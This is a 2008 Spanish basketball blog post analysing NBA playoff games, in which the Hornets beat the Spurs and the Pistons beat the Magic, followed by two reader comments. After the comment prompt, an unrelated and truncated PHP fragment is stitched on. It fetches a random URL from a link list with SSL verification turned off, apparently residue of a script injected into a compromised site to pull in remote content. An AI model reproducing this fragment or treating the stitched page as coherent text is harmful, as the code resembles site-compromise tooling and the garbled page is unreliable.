Favoritos

04 de May de 2008 por TheDeerHunter

Con la boca pequeña hemos considerado a los Hornets como favoritos al título esta temporada. Especulaciones sobre su falta de experiencia, de mentalidad, ligeras limitaciones en su plantilla… Anoche Hornets dió un puñetazo bien gordo encima de la mesa para mostrarnos que aquí están ellos. Aunque el verdadero golpe anoche, más que la mesa, se lo llevó Tim Duncan con un partido terrorífico. El peor que se le recuerda.

New Orleans se mostró superior en prácticamente todos los apartados del juego ante el equipo que más miedo daba tras se extraordinaria actuación en primera ronda. Si durante la primera parte Spurs se mantuvo bien en el partido con una buena defensa y un Bruce Bowen en estado de gracia (5-6 en triples) en la segunda todo se vino abajo.

El jugador clave, en esta ocasión, fue sin lugar a dudas David West que desintegró literalmente la defensa de Spurs y todos los intentos que provó Popovic para pararle. Ni Kurt Thomas, ni Oberto, ni Horry, ni nadie pudo detener la sangría. Por velocidad, por tiro, por cuerpo los superó a todos y esta vez ya no valían las faltas porque West los mete.

El NO Arena, cantaba todavía el MVP, MVP a pesar de que Chris Paul no tuvo su mejor noche quizá con la cabeza en ese premio que se escapa. Sin embargo, Popovic comprobó que va a ser un problema el plantar a Bowen a defender la estrella rival y es que Parker lo puede pasar bastante mal si le toca emparejarse con Stojakovic, Peterson o Bonzi Wells. CP3 correteaba sin la más mínima muestra de cansancio al final del partido redondeando sus números mientras la tríada de Spurs velaba armas en el banco para la próxima batalla. Es lo que tiene ser tan insultántemente joven.

Destacó también la actuación de Chandler por parte local, que barrió por completo a un Duncan en los tableros. Poco acostumbrado está el de las Islas Virgenes a emparejarse con los pívots rivales más potentes, función que suele ser asignada habitualmente a otros jugadores del equipo. Es otro problema que tendrá que resolver el técnico tejano ya que no tiene hombres específicos para poder neutralizar un juego interior tan equilibrado y complementario como el que forman Chandler y West. Es curioso que estuvieran mejor preparados contra Shaq&Stat.

Por parte visitante, esta vez no fue suficiente el buen partido de Tony Parker, Ginobili y Finley. Nunca pensé que llegaría a decir que SA tendrá que apretar mucho más los dientes en defensa si quiere llevarse el gato al agua.

Kriptonita para Supermán (Detroit 91 – Orlando 72)

Ya apuntábamos ayer en nuestro análisis previo cuales podían ser las claves de esta eliminatoria.

Anoche, como declaración de propósitos, Detroit se encargó de aclarar a su favor todas las cuestiones que lanzábamos punto por punto. La primera, en toda la frente. Si el juego de Orlando se centra en un juego interior dominante anoche los Pistons se encargaron de enseñarle cual es la diferencia entre jugar contra Toronto y hacerlo contra ellos. Dwight Howard fue incapaz de escapar de la pegajosa compañía de los pívots defensivos de Detroit y para colmo terminó lesionándose en su mano izquierda. Jason Maxiell, McDyess junto a Teo Ratliff se turnaron con eficacia para amargar la noche a la estrella rival y vaya si lo lograron. 

La buena actuación del turco Turkoglu no pudo evitar que fueran superados incluso en el apartado reboteador, precísamente donde se habían mostrado más poderosos durante la primera ronda. Por descontado que el supuesto desgaste físico de Detroit no se vió por ningún lado.

Ya anticipábamos también la superioridad del juego exterior de Pistons, aunque no podíamos imaginar que iba ser tan exagerada. Los Billups, Hamilton y Prince destrozaron literalmente a los Magic, sobre todo en la segunda parte. Más que ofensivamente, que lo hicieron, defensivamente estuvieron como verdaderos perros de presa y dejaron a sus pares en los peores números en tiro de toda la temporada. Si ya en primera ronda se adivinó que podían sufrir problemas en este aspecto anoche sólo Lewis pudo escapar de la quema y Orlando se quedó en unos pobres 30 puntos en toda la segunda parte con un lamentable 2/15 en tiro de tres.

El mensaje quedó claro. Detroit le envió un mensaje a Orlando de lo mal que lo van a pasar en esta eliminatoria y ahora falta comprobar si la escasa experiencia que tiene este equipo les va a permitir recuperarse moralmente del palo recibido. Trabajo tienen por delante.

Comenta

2 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    La defensa de New Orleans en el tercer cuarto fue impresionante, llegaban a todas las posiciones y no permitieron ni una acción facil, en palabras de propio Byron Scott consiguieron ‘que San Antonio pareciera un equipo viejo’.

      Citar

  2. telekoman dice:
    #2

    Detroit va a pasar esta eliminatoría de una forma mucho más concluyente que la anterior. Yo digo que un 4-1 y a pensar en la final.
    Los hornets son un enemigo que puede dar mñas deun disgusto este año. A Dallas ya se lo ha dado, y empieza a amargarle la fiesta a SA.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>